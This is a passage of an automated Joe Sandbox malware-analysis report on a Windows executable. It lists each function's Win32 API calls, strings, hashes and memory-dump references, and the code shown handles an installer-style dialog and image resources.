                                                                                            • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                            • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                            • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                            • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                            Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                            • GetMenu.USER32(?), ref: 00401E44
                                                                                              • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                              • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                              • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                              • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                            • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                              • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                              • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                              • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                              • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                              • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                              • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                              • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                            • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                            • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                            • String ID: IMAGES$STATIC
                                                                                            • API String ID: 4202116410-1168396491
                                                                                            • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                            • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                            • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                            • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                            Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                            • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                            • SetFocus.USER32(00000000), ref: 0040821D
                                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                            • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                            • IsWindow.USER32(00000000), ref: 00408297
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                            • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                            • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                              • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                              • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                              • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                              • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                              • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                              • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 855516470-0
                                                                                            • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                            • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                            • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                            • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                            Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                            • strncmp.MSVCRT ref: 004031F1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                            • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                            • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$lstrcmpstrncmp
                                                                                            • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                            • API String ID: 2881732429-172299233
                                                                                            • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                            • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                            • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                            • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                            Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                            • GetParent.USER32(?), ref: 00406B43
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                            • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                            • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                            • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                              • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                              • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 747815384-0
                                                                                            • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                            • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                            • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                            • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                            Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                            • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                            • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                            • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                            • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                            • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                            • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                            • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                            • String ID:
                                                                                            • API String ID: 1889686859-0
                                                                                            • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                            • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                            • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                            • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                            Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 00406F45
                                                                                            • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                            • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                            • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                            • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2586545124-0
                                                                                            • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                            • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                            • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                            • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                            Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                            • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                            • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                            • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3946207451-0
                                                                                            • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                            • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                            • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                            • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                            Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: IA$IA$IA$IA$IA$IA
                                                                                            • API String ID: 613200358-3743982587
                                                                                            • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                            • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                            • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                            • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                            Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                            • API String ID: 613200358-994561823
                                                                                            • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                            • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                            • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                            • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                            Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                            • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                            • GetDC.USER32(00000000), ref: 00406DFB
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
